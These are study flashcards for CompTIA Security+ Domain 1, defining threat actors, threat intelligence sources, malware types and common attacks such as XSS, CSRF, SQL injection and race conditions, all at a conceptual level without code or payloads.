Domain 1: Threats, Attacks, and Vulnerabilities (24%) Flashcards
*1.5 Actors and threats
White Hat (CompTIA: Authorized) ethical hackers, Penetration Testers
Non-malicious hackers who attempt to break into a company’s systems at their request
*1.5 Actors and threats
Black Hat (CompTIA: Unauthorized)
Malicious hackers who break into computer systems and networks without authorization or permission
*1.5 Actors and threats
Gray Hats (CompTIA: Semi-authorized)
Hackers without any affiliation to a company that attempts to break into a company’s network and risk breaking the law
*1.5 Actors and threats
Script kiddies
Have limited skill and only run other people’s exploits and tools
*1.5 Actors and threats
Hacktivists
Hackers who are driven by a cause like social change, political agendas, or terrorism.
ex: Anonymous
*1.5 Actors and threats
Advanced Persistent Threats (APT)
Highly trained and funded groups of hackers (often by nation-states) with covert and open-source intelligence at their disposal.
*1.5 Threat intelligence sources
Proprietary source
Proprietary is threat intelligence that comes as a commercial service offering, where you’re going to pay for access to these updates and research based on a subscription fee.
Note: Not as useful because these commercial services are just repackaging of information that’s available in free public registries.
*1.5 Threat intelligence sources
Closed-source
closed-source data is data that’s derived from the provider’s own research and analysis efforts, such as data from honeynets as they operate, plus information that’s mined
from their other customer systems, suitably anonymized-(to remove information that shows which particular person/entity something relates to).
example: FireEye
*1.5 Threat intelligence sources
Open-source
Open-source is data that’s available for use without a subscription, and this may include threat feeds similar to commercial providers, and it can contain reputation lists, and malware signature databases.
example: US-CERT, UK’s NCSC, AT&T Security (OTX), MISP, VirusTotal, Samphaus, SANS ISC Suspicious Domains.
*1.5 Threat intelligence sources
Open-source intelligence (OSINT)
Methods of obtaining information about a person or organization through public records, websites, and social media
example: Google, Facebook, enumeration scans. Public records, websites, and social media.
*1.7 Threat Hunting
A cybersecurity technique designed to detect the presence of threats that have not been discovered by normal security monitoring. it is proactive, not reactive like incident response.
*1.2 Malware
Malware
malicious software designed to infiltrate a computer system and possibly damage it without the user’s knowledge or consent.
examples: viruses, worms, trojan horses, ransomware, spyware, rootkits, spam.
*1.2 Malware
Virus
Malicious code that runs on a machine without the user’s knowledge and infects the computer when executed (10 types: Boot sector, Macro, Program, Miltipartite, Encrypted, Polymorphic, Metamorphic, Stealth, Armored, Hoax).
Remember: It needs user interaction like installing a program or opening a file
*1.2 Malware
Worms
Malicious software, like a virus, but able to replicate itself without user interaction. Doesn’t need you to do anything.
Example: A user receives an attachment to an e-mail or an instant message that contains a malicious worm. When the attachment is opened, the worm infects the user’s computer and then replicates itself by sending copies of the same e-mail or instant message to everyone in the user’s address book.
*1.2 Malware
Trojans
Trojan horses are a piece of malicious software that is disguised as a piece of harmless or desirable software that when downloaded it can conquer your computer and may open gates for other programs.
Note: Trojans are usually downloaded through e-mail attachments, websites, and instant messages. They are usually disguised as popular programs such as games, pictures, or music.
*1.2 Malware
Remote Access Trojan (RAT)
A trojan that provides the attacker with remote control of a victim machine.
Note: The ultimate backdoor that provides administrative control of a device (Prof. Messer).
*1.2 Malware
Ransomware
malware that restricts access to a victim’s computer or their files until a ransom is received.(locks your computer)
*1.2 Malware
Spyware
Software that secretly gathers information about the user without their consent. Hint: may include a keylogger.
Note: Adware is a type of spyware that displays ads based on what it spied on you.
*1.2 Malware
Rootkit
Software designed to gain administrative level control over a system without detection.
Note: DLL injections and driver manipulation = Rootkit
*1.1 Spam
the abuse of electronic messaging systems, most commonly through email.
-social media
-broadcast media
*1.1 Spim
abuse of instant messaging systems.
-texting
-instant messaging
What is a Threat Vector?
The method used by an attacker to access a victim’s machine
*1.1 What is a Watering hole attack?
When malware is placed on a website (watering hole) that you know your potential victims will access.
Example: A watering hole is a place where animals need to get water, a predator waits by the watering hole waiting for one of the animals to be careless. (malware is placed in a watering hole for animals to get).
*1.2 Malware
Botnet
A collection of compromised computers under the control of a master node
*1.2 Malware
Backdoor
Backdoors are used to bypass normal security and authentication functions.
A way for a software programmer to access a program while bypassing its authentication schemes. The backdoor is coded in by the programmer during development so that later she can “break into” her own program without having to authenticate to the system through normal access methods.
Note: Remote Access Trojans (RATs) are the ultimate backdoor- Administrative control of a device
*1.2 Malware
Logic Bombs
Malicious code that has been inserted inside a program and will execute
only when certain conditions have been met.
*1.4 Wireless
Bluejacking
Sending of unsolicited messages to Bluetooth-enabled devices.
*1.4 Wireless
Bluesnarfing
Unauthorized access of information from a wireless device over a Bluetooth connection. “taking info”
*1.2 Malware
Backdoor
Code placed in computer programs to bypass normal authentication and other security mechanisms.
§ Backdoors are a poor coding practice and should not be utilized.
*1.3 Directory Traversal
Method of accessing unauthorized directories by moving through the
directory structure on a remote server.
A directory traversal is a method of accessing unauthorized directories by moving through the directory structure on a remote server.
*1.6 Zero-day
Attack against a vulnerability that is unknown to the original developer or
manufacturer.
*1.3 Buffer overflows
Occurs when a process stores data outside the memory range allocated
by the developer.
Buffer overflows attempt to put more data into memory than it is designed to
hold.
Let’s pretend that you have a glass sitting on a table. It can hold a certain amount of water, right? If it’s designed to hold 16 ounces of liquid but you pour 20 ounces in, well, the cup is gonna overflow with water and the table is gonna get wet. In this example, the glass is our buffer and when we overflow it with our data, in our case water, the extra is gonna spill out
onto the table and make a huge mess.
*1.3 Cross-site scripting
XSS
Cross-site scripting occurs when an attacker embeds malicious scripting commands into a trusted website.
When this occurs, the attacker is trying to gain elevated privileges, steal information from a victim’s cookies, or gain other information stored by the victim’s web browser.
*1.3 Cross-site request forgery
XSRF/CSRF
In a cross-site request forgery, the attacker forces the user to execute actions on a web server that they already have been authenticated to.
For example, let’s say that you’ve already logged into your bank’s website and provided your username and your password. At this point, you’re already authenticated and the website trusts you. If an attacker can send a command to the web server through your authenticated session. They are forging the request to make it look like it came from you. The attacker in this case will be unable to see the web server’s response to his request or commands, but he could still use this to transfer funds from the victim, change their password or do a myriad of other requests on the victim’s behalf.
*1.3 Injections
Structured Query Language (SQL) injection
Attack consisting of the insertion or injection of an SQL query via input
data from the client to a web application.
*1.3 Injections
Extensible Markup Language (XML) injection
which is the extensible markup language. This is used by web applications for authentication and authorizations and for other types of data exchange and uploading.
*1.3 Race condition
A software vulnerability when the resulting outcome from execution processes is
directly dependent on the order and timing of certain events, and those events
fail to execute in the order and timing intended by the developer
o A race condition vulnerability is found where multiple threads are attempting to
write a variable or object at the same memory location
A really funky way of saying that basically the computer is trying to race itself.
So if you’re trying to do something legitimately and the attacker is trying to do something at the same time and they can get in before you, they have now taken advantage of this race condition to be able to run their thing before you can run yours. And this is a very specific case.
When we start talking about a race condition vulnerability, this is found when there are multiple threats attempting to write a variable or object at the same memory location, at the same time.
*1.3 Race conditions
Time of check/Time of Use (TOCTOU/TOC TO TOU)
The potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource.
If the attacker can identify the time the check happened, and then do something before it was used, that’s a race condition, they can then manipulate the data after it’s been checked, but before it was used by the application, and therefore caused some kind of an issue.
How can you prevent race conditions and TOCTTOU?
- Develop applications to not process things sequentially if possible
- Implement a locking mechanism to provide app with exclusive
access
